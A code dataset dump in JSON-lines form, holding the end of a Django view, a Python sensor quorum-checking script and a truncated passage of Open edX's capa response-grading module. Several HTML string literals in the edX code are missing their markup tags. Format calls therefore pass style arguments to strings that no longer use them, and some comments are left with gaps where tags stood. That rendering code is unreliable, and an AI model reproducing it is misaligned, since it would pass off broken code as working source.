render(request,'lunbo/upload_img.html')\n\n","repo_name":"lmh246/software-engineering","sub_path":"project/lunbo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31206843970","text":"import os\nimport sys\nimport datetime\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\nimport controller.modules.const as CONST # Operating Values that may need to be tweaked moved to separate file in includes.\nfrom controller.modules.AHT20 import AHT20 # Lib for AHT20 sensors\nimport controller.modules.TCA9548A as TCA9548 # Lib for I2C MUX\n\n\ndef quorum_check(value_x, value_y, value_z, delta_max):\n \"\"\"\n Quorum Checking function\n Requires 3 input values and a max allowed delta between sensors as args.\n Checks all 3 values against each other and max delta to determine if sensor has\n failed or is way out of agreement with the other two.\n Returns a \"Return Code\" and a value.\n Return Codes:\n 0 - All sensors agree,\n 1 - sensor x out of spec,\n 2 - sensor y out of spec,\n 3 - sensor z out of spec,\n 4 - no sensors agree, you should error out/email/alarm/etc.\n 5 - sensors agree in pairs but spread across all 3 exceeds delta\n \"\"\"\n # Reset values\n agree_xy = False\n agree_xz = False\n agree_yz = False\n\n x_min = value_x - delta_max\n x_max = value_x + delta_max\n y_min = value_y - delta_max\n y_max = value_y + delta_max\n\n # Check for agreement between pairs\n if x_min <= value_y <= x_max:\n agree_xy = True\n if x_min <= value_z <= x_max:\n agree_xz = True\n if y_min <= value_z <= y_max:\n agree_yz = True\n\n # Evaluate if all sensors either disagree or agree\n if not (agree_xy) and not (agree_xz) and not (agree_yz):\n val = 0\n return_val = [4, val]\n return return_val # Set this to return error code stating none of the sensors agree\n\n if agree_xy and agree_xz and agree_yz:\n val = (value_x + value_y + value_z) / 3\n val = round(val, 1)\n return_val = [0, val]\n return (\n return_val # Set this to return all good code and average of all 3 sensors\n )\n\n # Catch edge case of agreement between two separate pairs but not the third.\n # For this case also return an average of all 3.\n if (\n (agree_xy and agree_yz and not agree_xz)\n or (agree_yz and agree_xz and not agree_xy)\n or (agree_xy and agree_xz and not agree_yz)\n ):\n val = (value_x + value_y + value_z) / 3\n val = round(val, 1)\n return_val = [5, val]\n return return_val # Set this to return all large spread code and average of all 3 sensors\n\n # If we flow through all the previous checks, identify which sensor is out of line with quorum.\n if agree_xy and not agree_yz and not agree_xz:\n val = (value_x + value_y) / 2\n val = round(val, 1)\n return_val = [3, val]\n return return_val # Set this to return one bad sensor code for sensor z and average of 2 remaining sensors\n\n if not agree_xy and agree_yz and not agree_xz:\n val = (value_y + value_z) / 2\n val = round(val, 1)\n return_val = [1, val]\n return return_val # Set this to return one bad sensor code for sensor x and average of 2 remaining sensors\n\n if not agree_xy and not agree_yz and agree_xz:\n val = (value_x + value_z) / 2\n val = round(val, 1)\n return_val = [2, val]\n return return_val # Set this to return one bad sensor code for sensor y and average of 2 remaining sensors\n\n\ndef get_sensor_data():\n \"\"\"\n Get Sensor Data\n In this block we will read 3 temp/humidity sensors, call quorum\n function and report readings and/or error conditions. We require the MUX\n lane (1/2/3/4/5/6/7/8) for sensors A/B/C set in the globals as well as max\n drift between two sensors beyond which we consider a sensor to be in error.\n Select the appropriate mux port for each AHT20 sensor then read the values,\n check for quorum, return values.\n DEV NOTE: Remember to set handling for exceptional errors.\n \"\"\"\n TCA9548.i2c_mux_channel(\n I2CBus=CONST.I2C_BUS,\n multiplexer_addr=CONST.I2C_MUX_ADDR,\n i2c_channel_setup=CONST.AHTX_MUX_CHAN,\n debug_status=CONST.DEBUG_STATUS,\n )\n sensor_a = AHT20(I2CBusNum=CONST.I2C_BUS)\n sensor_a_hum = sensor_a.get_humidity()\n sensor_a_temp = sensor_a.get_temperature()\n\n TCA9548.i2c_mux_channel(\n I2CBus=CONST.I2C_BUS,\n multiplexer_addr=CONST.I2C_MUX_ADDR,\n i2c_channel_setup=CONST.AHTY_MUX_CHAN,\n debug_status=CONST.DEBUG_STATUS,\n )\n sensor_b = AHT20(I2CBusNum=CONST.I2C_BUS)\n sensor_b_hum = sensor_b.get_humidity()\n sensor_b_temp = sensor_b.get_temperature()\n\n TCA9548.i2c_mux_channel(\n I2CBus=CONST.I2C_BUS,\n multiplexer_addr=CONST.I2C_MUX_ADDR,\n i2c_channel_setup=CONST.AHTZ_MUX_CHAN,\n debug_status=CONST.DEBUG_STATUS,\n )\n sensor_c = AHT20(I2CBusNum=CONST.I2C_BUS)\n sensor_c_hum = sensor_c.get_humidity()\n sensor_c_temp = sensor_c.get_temperature()\n\n last_sensor_read_time = datetime.datetime.now()\n\n temp_check = quorum_check(\n sensor_a_temp, sensor_b_temp, sensor_c_temp, CONST.MAX_TEMP_SENSOR_DRIFT\n )\n hum_check = quorum_check(\n sensor_a_hum, sensor_b_hum, sensor_c_hum, CONST.MAX_HUMI_SENSOR_DRIFT\n )\n\n if temp_check[0] == 0:\n # All sensors agree\n return_temp = temp_check[1]\n return_temp_code = \"Good\"\n if temp_check[0] == 1:\n # Sensor X Bad\n return_temp = temp_check[1]\n return_temp_code = \"Sensor X Disagrees\"\n sys.stderr.write(\"Temperature Sensor X disagrees with other two.\")\n if temp_check[0] == 2:\n # Sensor Y Bad\n return_temp = temp_check[1]\n return_temp_code = \"Sensor Y Disagrees\"\n sys.stderr.write(\"Temperature Sensor Y disagrees with other two.\")\n if temp_check[0] == 3:\n # Sensor Z Bad\n return_temp = temp_check[1]\n return_temp_code = \"Sensor Z Disagrees\"\n sys.stderr.write(\"Temperature Sensor Z disagrees with other two.\")\n if temp_check[0] == 4:\n # No sensors agree\n return_temp = 0\n return_temp_code = \"No Sensors Agree\"\n sys.stderr.write(\"None of the Termperature Sensors agree.\")\n if temp_check[0] == 5:\n # 2 pair agreement, spread > MAX_DRIFT but average usable\n return_temp = temp_check[1]\n return_temp_code = \"Large Spread\"\n sys.stderr.write(\n \"Range Across All Temperature Sensors exceeds max delta but pairs good.\"\n )\n\n if hum_check[0] == 0:\n # All sensors agree\n return_hum = hum_check[1]\n return_hum_code = \"Good\"\n if hum_check[0] == 1:\n # Sensor X Bad\n return_hum = hum_check[1]\n return_hum_code = \"Sensor X Disagrees\"\n sys.stderr.write(\"Humidity Sensor X disagrees with other two.\")\n if hum_check[0] == 2:\n # Sensor Y Bad\n return_hum = hum_check[1]\n return_hum_code = \"Sensor Y Disagrees\"\n sys.stderr.write(\"Humidity Sensor Y disagrees with other two.\")\n if hum_check[0] == 3:\n # Sensor Z Bad\n return_hum = hum_check[1]\n return_hum_code = \"Sensor Z Disagrees\"\n sys.stderr.write(\"Humidity Sensor Z disagrees with other two.\")\n if hum_check[0] == 4:\n # No sensors agree\n return_hum = 0\n return_hum_code = \"No Sensors Agree\"\n sys.stderr.write(\"None of the Humidity Sensors agree.\")\n if hum_check[0] == 5:\n # 2 pair agreement, spread > MAX_DRIFT but average usable\n return_hum = hum_check[1]\n return_hum_code = \"Large Spread\"\n sys.stderr.write(\n \"Range Across All Humidity Sensors exceeds max delta but pairs good.\"\n )\n\n return (\n last_sensor_read_time,\n return_temp_code,\n return_temp,\n return_hum_code,\n return_hum,\n )\n\n\n# Read Sensors\n(\n last_sensor_read_time,\n read_temp_code,\n read_temp,\n read_hum_code,\n read_hum,\n) = get_sensor_data()\n\nprint(\n \"Temp Quorum is \"\n + str(read_temp)\n + \" degrees with code '\"\n + str(read_temp_code)\n + \"' at \"\n + str(last_sensor_read_time)\n + \".\"\n)\nprint(\n \"Humidity Quorum is \"\n + str(read_hum)\n + \"% with code '\"\n + str(read_hum_code)\n + \"' at \"\n + str(last_sensor_read_time)\n + \".\"\n)\n","repo_name":"PedanticAvenger/SBCuterie","sub_path":"tests/readsensors.py","file_name":"readsensors.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12618026613","text":"\"\"\"\nProblem response evaluation. Handles checking of student responses,\nof a variety of types.\n\nUsed by capa_problem.py\n\"\"\"\n# standard library imports\nimport abc\nimport inspect\nimport json\nimport logging\nimport numbers\nimport re\nimport sys\nimport textwrap\nimport traceback\nfrom cmath import isnan\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom sys import float_info\n\nimport html5lib\nimport numpy\nimport random2 as random\nimport requests\nimport six\n# specific library imports\nfrom calc import UndefinedVariable, UnmatchedParenthesis, evaluator\nfrom django.utils import html\n\nfrom lxml import etree\nfrom lxml.html.soupparser import fromstring as fromstring_bs # uses Beautiful Soup!!! FIXME?\nfrom pyparsing import ParseException\nfrom pytz import UTC\nfrom shapely.geometry import MultiPoint, Point\nfrom six.moves import map, range, zip\n\nimport xmodule.capa.safe_exec as safe_exec\nimport xmodule.capa.xqueue_interface as xqueue_interface\nfrom openedx.core.djangolib.markup import HTML, Text\nfrom openedx.core.lib.grade_utils import round_away_from_zero\n\nfrom . import correctmap\nfrom .registry import TagRegistry\nfrom .util import (\n compare_with_tolerance,\n contextualize_text,\n convert_files_to_filenames,\n default_tolerance,\n find_with_default,\n get_course_id_from_capa_block,\n get_inner_html_from_xpath,\n is_list_of_files\n)\n\nlog = logging.getLogger(__name__)\n\nregistry = TagRegistry()\n\nCorrectMap = correctmap.CorrectMap\nCORRECTMAP_PY = None\n\n# Make '_' a no-op so we can scrape strings. Using lambda instead of\n# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file\n_ = lambda text: text\n\nQUESTION_HINT_CORRECT_STYLE = 'feedback-hint-correct'\nQUESTION_HINT_INCORRECT_STYLE = 'feedback-hint-incorrect'\nQUESTION_HINT_LABEL_STYLE = 'hint-label'\nQUESTION_HINT_TEXT_STYLE = 'hint-text'\nQUESTION_HINT_MULTILINE = 'feedback-hint-multi'\n\n#-----------------------------------------------------------------------------\n# Exceptions\n\n\nclass LoncapaProblemError(Exception):\n \"\"\"\n Error in specification of a problem\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n\nclass ResponseError(Exception):\n \"\"\"\n Error for failure in processing a response, including\n exceptions that occur when executing a custom script.\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n\nclass StudentInputError(Exception):\n \"\"\"\n Error for an invalid student input.\n For example, submitting a string when the problem expects a number\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n#-----------------------------------------------------------------------------\n#\n# Main base class for CAPA responsetypes\n\n\nclass LoncapaResponse(six.with_metaclass(abc.ABCMeta, object)):\n \"\"\"\n Base class for CAPA responsetypes. Each response type (ie a capa question,\n which is part of a capa problem) is represented as a subclass,\n which should provide the following methods:\n\n - get_score : evaluate the given student answers, and return a CorrectMap\n - get_answers : provide a dict of the expected answers for this problem\n\n Each subclass must also define the following attributes:\n\n - tags : xhtml tags identifying this response (used in auto-registering)\n\n In addition, these methods are optional:\n\n - setup_response : find and note the answer input field IDs for the response; called\n by __init__\n\n - check_hint_condition : check to see if the student's answers satisfy a particular\n condition for a hint to be displayed\n\n - render_html : render this Response as HTML (must return XHTML-compliant string)\n - __str__ : unicode representation of this Response\n\n Each response type may also specify the following attributes:\n\n - max_inputfields : (int) maximum number of answer input fields (checked in __init__\n if not None)\n\n - allowed_inputfields : list of allowed input fields (each a string) for this Response\n\n - required_attributes : list of required attributes (each a string) on the main\n response XML stanza\n\n - hint_tag : xhtml tag identifying hint associated with this response inside\n hintgroup\n \"\"\"\n\n tags = None\n hint_tag = None\n has_partial_credit = False\n credit_type = []\n\n max_inputfields = None\n allowed_inputfields = []\n required_attributes = []\n\n # Overridable field that specifies whether this capa response type has support for\n # for rendering on devices of different sizes and shapes.\n # By default, we set this to False, allowing subclasses to override as appropriate.\n multi_device_support = False\n\n def __init__(self, xml, inputfields, context, system, capa_block, minimal_init):\n \"\"\"\n Init is passed the following arguments:\n\n - xml : ElementTree of this Response\n - inputfields : ordered list of ElementTrees for each input entry field in this Response\n - context : script processor context\n - system : LoncapaSystem instance which provides OS, rendering, and user context\n - capa_block : Capa block, to access runtime\n \"\"\"\n self.xml = xml\n self.inputfields = inputfields\n self.context = context\n self.capa_system = system\n self.capa_block = capa_block # njp, note None\n\n self.id = xml.get('id')\n\n # The LoncapaProblemError messages here do not need to be translated as they are\n # only displayed to the user when settings.DEBUG is True\n for abox in inputfields:\n if abox.tag not in self.allowed_inputfields:\n msg = \"%s: cannot have input field %s\" % (\n str(self), abox.tag)\n msg += \"\\nSee XML source line %s\" % getattr(\n xml, 'sourceline', '[unavailable]')\n raise LoncapaProblemError(msg)\n\n if self.max_inputfields and len(inputfields) > self.max_inputfields:\n msg = \"%s: cannot have more than %s input fields\" % (\n str(self), self.max_inputfields)\n msg += \"\\nSee XML source line %s\" % getattr(\n xml, 'sourceline', '[unavailable]')\n raise LoncapaProblemError(msg)\n\n for prop in self.required_attributes:\n if not xml.get(prop):\n msg = \"Error in problem specification: %s missing required attribute %s\" % (\n str(self), prop)\n msg += \"\\nSee XML source line %s\" % getattr(\n xml, 'sourceline', '[unavailable]')\n raise LoncapaProblemError(msg)\n\n # ordered list of answer_id values for this response\n self.answer_ids = [x.get('id') for x in self.inputfields]\n if self.max_inputfields == 1:\n # for convenience\n self.answer_id = self.answer_ids[0]\n\n # map input_id -> maxpoints\n self.maxpoints = {}\n for inputfield in self.inputfields:\n # By default, each answerfield is worth 1 point\n maxpoints = inputfield.get('points', '1')\n self.maxpoints.update({inputfield.get('id'): int(maxpoints)})\n\n if not minimal_init:\n # dict for default answer map (provided in input elements)\n self.default_answer_map = {}\n for entry in self.inputfields:\n answer = entry.get('correct_answer')\n if answer:\n self.default_answer_map[entry.get(\n 'id')] = contextualize_text(answer, self.context)\n\n # Does this problem have partial credit?\n # If so, what kind? Get it as a list of strings.\n partial_credit = xml.xpath('.')[0].get('partial_credit', default=False)\n\n if str(partial_credit).lower().strip() == 'false':\n self.has_partial_credit = False\n self.credit_type = []\n else:\n self.has_partial_credit = True\n self.credit_type = partial_credit.split(',')\n self.credit_type = [word.strip().lower() for word in self.credit_type]\n\n if hasattr(self, 'setup_response'):\n self.setup_response()\n\n def get_max_score(self):\n \"\"\"\n Return the total maximum points of all answer fields under this Response\n \"\"\"\n return sum(self.maxpoints.values())\n\n def render_html(self, renderer, response_msg=''):\n \"\"\"\n Return XHTML Element tree representation of this Response.\n\n Arguments:\n\n - renderer : procedure which produces HTML given an ElementTree\n - response_msg: a message displayed at the end of the Response\n \"\"\"\n _ = self.capa_system.i18n.gettext\n\n # response_id = problem_id + response index\n response_id = self.xml.attrib['id']\n\n response_index = response_id.split('_')[-1]\n # Translators: index here could be 1,2,3 and so on\n response_label = _('Question {index}').format(index=response_index)\n\n # wrap the content inside a section\n tree = etree.Element('div')\n tree.set('class', 'wrapper-problem-response')\n tree.set('tabindex', '-1')\n tree.set('aria-label', response_label)\n tree.set('role', 'group')\n\n if self.xml.get('multiple_inputtypes'):\n # add
    to wrap all inputtypes\n content = etree.SubElement(tree, 'div')\n content.set('class', 'multi-inputs-group')\n content.set('role', 'group')\n\n if self.xml.get('multiinput-group-label-id'):\n content.set('aria-labelledby', self.xml.get('multiinput-group-label-id'))\n\n if self.xml.get('multiinput-group_description_ids'):\n content.set('aria-describedby', self.xml.get('multiinput-group_description_ids'))\n else:\n content = tree\n\n # problem author can make this span display:inline\n if self.xml.get('inline', ''):\n tree.set('class', 'inline')\n\n for item in self.xml:\n # call provided procedure to do the rendering\n item_xhtml = renderer(item)\n if item_xhtml is not None:\n content.append(item_xhtml)\n tree.tail = self.xml.tail\n\n # Add a
    for the message at the end of the response\n if response_msg:\n content.append(self._render_response_msg_html(response_msg))\n\n return tree\n\n def evaluate_answers(self, student_answers, old_cmap):\n \"\"\"\n Called by capa_problem.LoncapaProblem to evaluate student answers, and to\n generate hints (if any).\n\n Returns the new CorrectMap, with (correctness,msg,hint,hintmode) for each answer_id.\n \"\"\"\n new_cmap = self.get_score(student_answers)\n self.get_hints(convert_files_to_filenames(\n student_answers), new_cmap, old_cmap)\n return new_cmap\n\n def make_hint_div(self, hint_node, correct, student_answer, question_tag,\n label=None, hint_log=None, multiline_mode=False, log_extra=None):\n \"\"\"\n Returns the extended hint div based on the student_answer\n or the empty string if, after processing all the arguments, there is no hint.\n As a side effect, logs a tracking log event detailing the hint.\n\n Keyword args:\n * hint_node: xml node such as , holding extended hint text. May be passed in as None.\n * correct: bool indication if the student answer is correct\n * student_answer: list length 1 or more of string answers\n (only checkboxes make multiple answers)\n * question_tag: string name of enclosing question, e.g. 'choiceresponse'\n * label: (optional) if None (the default), extracts the label from the node,\n otherwise using this value. The value '' inhibits labeling of the hint.\n * hint_log: (optional) hints to be used, passed in as list-of-dict format (below)\n * multiline_mode: (optional) bool, default False, hints should be shown one-per line\n * log_extra: (optional) dict items to be injected in the tracking log\n\n There are many parameters to this method because a variety of extended hint contexts\n all bottleneck through here. In addition, the caller must provide detailed background\n information about the hint-trigger to go in the tracking log.\n\n hint_log format: list of dicts with each hint as a 'text' key. Each dict has extra\n information for logging, essentially recording the logic which triggered the feedback.\n Case 1: records which choices triggered\n e.g. [{'text': 'feedback 1', 'trigger': [{'choice': 'choice_0', 'selected': True}]},...\n Case 2: a compound hint, the trigger list has 1 or more choices\n e.g. [{'text': 'a hint', 'trigger':[{'choice': 'choice_0', 'selected': True},\n {'choice': 'choice_1', 'selected':True}]}]\n \"\"\"\n _ = self.capa_system.i18n.gettext\n # 1. Establish the hint_texts\n # This can lead to early-exit if the hint is blank.\n if not hint_log:\n # .text can be None when node has immediate children nodes\n if hint_node is None or (hint_node.text is None and len(hint_node.getchildren()) == 0):\n return ''\n hint_text = get_inner_html_from_xpath(hint_node)\n if not hint_text:\n return ''\n hint_log = [{'text': hint_text}]\n # invariant: xxxx\n\n # 2. Establish the label:\n # Passed in, or from the node, or the default\n if not label and hint_node is not None:\n label = hint_node.get('label', None)\n # Tricky: label None means output defaults, while '' means output empty label\n if label is None:\n if correct:\n label = _('Correct:')\n else:\n label = _('Incorrect:')\n\n # This is the \"feedback hint\" event\n event_info = {}\n event_info['module_id'] = str(self.capa_block.location)\n event_info['problem_part_id'] = self.id\n event_info['trigger_type'] = 'single' # maybe be overwritten by log_extra\n event_info['hint_label'] = label\n event_info['hints'] = hint_log\n event_info['correctness'] = correct\n event_info['student_answer'] = student_answer\n event_info['question_type'] = question_tag\n if log_extra:\n event_info.update(log_extra)\n self.capa_block.runtime.publish(self.capa_block, 'edx.problem.hint.feedback_displayed', event_info)\n\n # Form the div-wrapped hint texts\n hints_wrap = HTML('').join(\n [HTML('
    {hint_content}
    ').format(\n question_hint_text_style=QUESTION_HINT_TEXT_STYLE,\n hint_content=HTML(dct.get('text'))\n ) for dct in hint_log]\n )\n if multiline_mode:\n hints_wrap = HTML('
    {hints_wrap}
    ').format(\n question_hint_multiline=QUESTION_HINT_MULTILINE,\n hints_wrap=hints_wrap\n )\n label_wrap = ''\n if label:\n label_wrap = HTML('{label} ').format(\n question_hint_label_style=QUESTION_HINT_LABEL_STYLE,\n label=Text(label)\n )\n\n # Establish the outer style\n if correct:\n style = QUESTION_HINT_CORRECT_STYLE\n else:\n style = QUESTION_HINT_INCORRECT_STYLE\n\n # Ready to go\n return HTML('
    {text}
    {lwrp}{hintswrap}
    ').format(\n st=style,\n text=Text(_(\"Answer\")),\n lwrp=label_wrap,\n hintswrap=hints_wrap\n )\n\n def get_extended_hints(self, student_answers, new_cmap):\n \"\"\"\n Pull \"extended hint\" information out the xml based on the student answers,\n installing it in the new_map for display.\n Implemented by subclasses that have extended hints.\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n def get_hints(self, student_answers, new_cmap, old_cmap):\n \"\"\"\n Generate adaptive hints for this problem based on student answers, the old CorrectMap,\n and the new CorrectMap produced by get_score.\n\n Does not return anything.\n\n Modifies new_cmap, by adding hints to answer_id entries as appropriate.\n \"\"\"\n\n hintfn = None\n hint_function_provided = False\n hintgroup = self.xml.find('hintgroup')\n if hintgroup is not None:\n hintfn = hintgroup.get('hintfn')\n if hintfn is not None:\n hint_function_provided = True\n\n if hint_function_provided:\n # if a hint function has been supplied, it will take precedence\n # Hint is determined by a function defined in the \n \"\"\"\n\n human_name = _('Custom Evaluated Script')\n tags = ['customresponse']\n\n allowed_inputfields = ['textline', 'textbox', 'crystallography',\n 'chemicalequationinput', 'vsepr_input',\n 'drag_and_drop_input', 'designprotein2dinput',\n 'editageneinput', 'annotationinput',\n 'jsinput', 'formulaequationinput']\n code = None\n expect = None\n\n # Standard amount for partial credit if not otherwise specified:\n default_pc = 0.5\n\n def setup_response(self):\n xml = self.xml\n\n # if has an \"expect\" (or \"answer\") attribute then save\n # that\n self.expect = contextualize_text(xml.get('expect') or xml.get('answer'), self.context)\n\n log.debug('answer_ids=%s', self.answer_ids)\n\n # the ... stanza should be local to the current .\n # So try looking there first.\n self.code = None\n answer = None\n try:\n answer = xml.xpath('//*[@id=$id]//answer', id=xml.get('id'))[0]\n except IndexError:\n # print \"xml = \",etree.tostring(xml,pretty_print=True)\n\n # if we have a \"cfn\" attribute then look for the function specified by cfn, in\n # the problem context ie the comparison function is defined in the\n # stanza instead\n cfn = xml.get('cfn')\n if cfn:\n log.debug(\"cfn = %s\", cfn)\n\n # This is a bit twisty. We used to grab the cfn function from\n # the context, but now that we sandbox Python execution, we\n # can't get functions from previous executions. So we make an\n # actual function that will re-execute the original script,\n # and invoke the function with the data needed.\n def make_check_function(script_code, cfn):\n def check_function(expect, ans, **kwargs):\n extra_args = \"\".join(\", {0}={0}\".format(k) for k in kwargs)\n code = (\n script_code + \"\\n\" +\n \"cfn_return = %s(expect, ans%s)\\n\" % (cfn, extra_args)\n )\n globals_dict = {\n 'expect': expect,\n 'ans': ans,\n }\n globals_dict.update(kwargs)\n safe_exec.safe_exec(\n code,\n globals_dict,\n python_path=self.context['python_path'],\n extra_files=self.context['extra_files'],\n slug=self.id,\n random_seed=self.context['seed'],\n unsafely=self.capa_system.can_execute_unsafe_code(),\n )\n return globals_dict['cfn_return']\n return check_function\n\n self.code = make_check_function(self.context['script_code'], cfn)\n\n if not self.code:\n if answer is None:\n log.error(\"[courseware.capa.responsetypes.customresponse] missing\"\n \" code checking script! id=%s\", self.id)\n self.code = ''\n else:\n answer_src = answer.get('src')\n if answer_src is not None:\n # TODO: this code seems not to be used any more since self.capa_system.filesystem doesn't exist.\n self.code = self.capa_system.filesystem.open('src/' + answer_src).read()\n else:\n self.code = answer.text\n\n def get_score(self, student_answers):\n \"\"\"\n student_answers is a dict with everything from request.POST, but with the first part\n of each key removed (the string before the first \"_\").\n \"\"\"\n _ = self.capa_system.i18n.gettext\n\n log.debug('%s: student_answers=%s', str(self), student_answers)\n\n # ordered list of answer id's\n # sort the responses on the bases of the problem's position number\n # which can be found in the last place in the problem id. Then convert\n # this number into an int, so that we sort on ints instead of strings\n idset = sorted(self.answer_ids, key=lambda x: int(x.split(\"_\")[-1]))\n try:\n # ordered list of answers\n submission = [student_answers[k] for k in idset]\n except Exception as err:\n msg = \"[courseware.capa.responsetypes.customresponse] {message}\\n idset = {idset}, error = {err}\".format(\n message=_(\"error getting student answer from {student_answers}\").format(\n student_answers=student_answers,\n ),\n idset=idset,\n err=err\n )\n\n log.error(\n \"[courseware.capa.responsetypes.customresponse] error getting\"\n \" student answer from %s\"\n \"\\n idset = %s, error = %s\",\n student_answers, idset, err\n )\n raise Exception(msg) # lint-amnesty, pylint: disable=raise-missing-from\n\n # global variable in context which holds the Presentation MathML from dynamic math input\n # ordered list of dynamath responses\n dynamath = [student_answers.get(k + '_dynamath', None) for k in idset]\n\n # if there is only one box, and it's empty, then don't evaluate\n if len(idset) == 1 and not submission[0]:\n # default to no error message on empty answer (to be consistent with other\n # responsetypes) but allow author to still have the old behavior by setting\n # empty_answer_err attribute\n msg = (HTML('{0}').format(_('No answer entered!'))\n if self.xml.get('empty_answer_err') else '')\n return CorrectMap(idset[0], 'incorrect', msg=msg)\n\n # NOTE: correct = 'unknown' could be dangerous. Inputtypes such as textline are\n # not expecting 'unknown's\n correct = ['unknown'] * len(idset)\n messages = [''] * len(idset)\n overall_message = \"\"\n\n # put these in the context of the check function evaluator\n # note that this doesn't help the \"cfn\" version - only the exec version\n self.context.update({\n # my ID\n 'response_id': self.id,\n\n # expected answer (if given as attribute)\n 'expect': self.expect,\n\n # ordered list of student answers from entry boxes in our subtree\n 'submission': submission,\n\n # ordered list of ID's of all entry boxes in our subtree\n 'idset': idset,\n\n # ordered list of all javascript inputs in our subtree\n 'dynamath': dynamath,\n\n # dict of student's responses, with keys being entry box IDs\n 'answers': student_answers,\n\n # the list to be filled in by the check function\n 'correct': correct,\n\n # the list of messages to be filled in by the check function\n 'messages': messages,\n\n # a message that applies to the entire response\n # instead of a particular input\n 'overall_message': overall_message,\n\n # any options to be passed to the cfn\n 'options': self.xml.get('options'),\n 'testdat': 'hello world',\n })\n\n # Pass DEBUG to the check function.\n self.context['debug'] = self.capa_system.DEBUG\n\n # Run the check function\n self.execute_check_function(idset, submission)\n\n # build map giving \"correct\"ness of the answer(s)\n correct = self.context['correct']\n messages = self.context['messages']\n overall_message = self.clean_message_html(self.context['overall_message'])\n grade_decimals = self.context.get('grade_decimals')\n\n correct_map = CorrectMap()\n correct_map.set_overall_message(overall_message)\n\n for k in range(len(idset)): # lint-amnesty, pylint: disable=consider-using-enumerate\n max_points = self.maxpoints[idset[k]]\n if grade_decimals:\n npoints = max_points * grade_decimals[k]\n else:\n if correct[k] == 'correct':\n npoints = max_points\n elif correct[k] == 'partially-correct':\n npoints = max_points * self.default_pc\n else:\n npoints = 0\n correct_map.set(idset[k], correct[k], msg=messages[k],\n npoints=npoints)\n return correct_map\n\n def execute_check_function(self, idset, submission): # lint-amnesty, pylint: disable=missing-function-docstring, too-many-statements\n # exec the check function\n if isinstance(self.code, str): # lint-amnesty, pylint: disable=too-many-nested-blocks\n try:\n safe_exec.safe_exec(\n self.code,\n self.context,\n cache=self.capa_system.cache,\n python_path=self.context['python_path'],\n extra_files=self.context['extra_files'],\n slug=self.id,\n random_seed=self.context['seed'],\n unsafely=self.capa_system.can_execute_unsafe_code(),\n )\n except Exception as err: # pylint: disable=broad-except\n self._handle_exec_exception(err)\n\n else:\n # self.code is not a string; it's a function we created earlier.\n\n # this is an interface to the Tutor2 check functions\n tutor_cfn = self.code\n answer_given = submission[0] if (len(idset) == 1) else submission\n kwnames = self.xml.get(\"cfn_extra_args\", \"\").split()\n kwargs = {n: self.context.get(n) for n in kwnames}\n log.debug(\" submission = %s\", submission)\n try:\n ret = tutor_cfn(self.expect, answer_given, **kwargs)\n except Exception as err: # pylint: disable=broad-except\n self._handle_exec_exception(err)\n log.debug(\n \"[courseware.capa.responsetypes.customresponse.get_score] ret = %s\",\n ret\n )\n if isinstance(ret, dict):\n # One kind of dictionary the check function can return has the\n # form {'ok': BOOLEAN or STRING, 'msg': STRING, 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)}\n # 'ok' will control the checkmark, while grade_decimal, if present, will scale\n # the score the student receives on the response.\n # If there are multiple inputs, they all get marked\n # to the same correct/incorrect value\n if 'ok' in ret:\n\n # Returning any falsy value or the \"false\" string for \"ok\" gives incorrect.\n # Returning any string that includes \"partial\" for \"ok\" gives partial credit.\n # Returning any other truthy value for \"ok\" gives correct\n\n ok_val = str(ret['ok']).lower().strip() if bool(ret['ok']) else 'false'\n\n if ok_val == 'false':\n correct = 'incorrect'\n elif 'partial' in ok_val:\n correct = 'partially-correct'\n else:\n correct = 'correct'\n correct = [correct] * len(idset) # All inputs share the same mark.\n\n # old version, no partial credit:\n # correct = ['correct' if ret['ok'] else 'incorrect'] * len(idset)\n\n msg = ret.get('msg', None)\n msg = self.clean_message_html(msg)\n\n # If there is only one input, apply the message to that input\n # Otherwise, apply the message to the whole problem\n if len(idset) > 1:\n self.context['overall_message'] = msg\n else:\n self.context['messages'][0] = msg\n\n if 'grade_decimal' in ret:\n decimal = float(ret['grade_decimal'])\n else:\n if correct[0] == 'correct':\n decimal = 1.0\n elif correct[0] == 'partially-correct':\n decimal = self.default_pc\n else:\n decimal = 0.0\n grade_decimals = [decimal] * len(idset)\n self.context['grade_decimals'] = grade_decimals\n\n # Another kind of dictionary the check function can return has\n # the form:\n # { 'overall_message': STRING,\n # 'input_list': [\n # {\n # 'ok': BOOLEAN or STRING,\n # 'msg': STRING,\n # 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)\n # },\n # ...\n # ]\n # }\n # 'ok' will control the checkmark, while grade_decimal, if present, will scale\n # the score the student receives on the response.\n #\n # This allows the function to return an 'overall message'\n # that applies to the entire problem, as well as correct/incorrect\n # status, scaled grades, and messages for individual inputs\n elif 'input_list' in ret:\n overall_message = ret.get('overall_message', '')\n input_list = ret['input_list']\n\n correct = []\n messages = []\n grade_decimals = []\n\n # Returning any falsy value or the \"false\" string for \"ok\" gives incorrect.\n # Returning any string that includes \"partial\" for \"ok\" gives partial credit.\n # Returning any other truthy value for \"ok\" gives correct\n\n for input_dict in input_list:\n if str(input_dict['ok']).lower().strip() == \"false\" or not input_dict['ok']:\n correct.append('incorrect')\n elif 'partial' in str(input_dict['ok']).lower().strip():\n correct.append('partially-correct')\n else:\n correct.append('correct')\n\n # old version, no partial credit\n # correct.append('correct'\n # if input_dict['ok'] else 'incorrect')\n\n msg = (self.clean_message_html(input_dict['msg'])\n if 'msg' in input_dict else None)\n messages.append(msg)\n if 'grade_decimal' in input_dict:\n decimal = input_dict['grade_decimal']\n else:\n if str(input_dict['ok']).lower().strip() == 'true':\n decimal = 1.0\n elif 'partial' in str(input_dict['ok']).lower().strip():\n decimal = self.default_pc\n else:\n decimal = 0.0\n grade_decimals.append(decimal)\n\n self.context['messages'] = messages\n 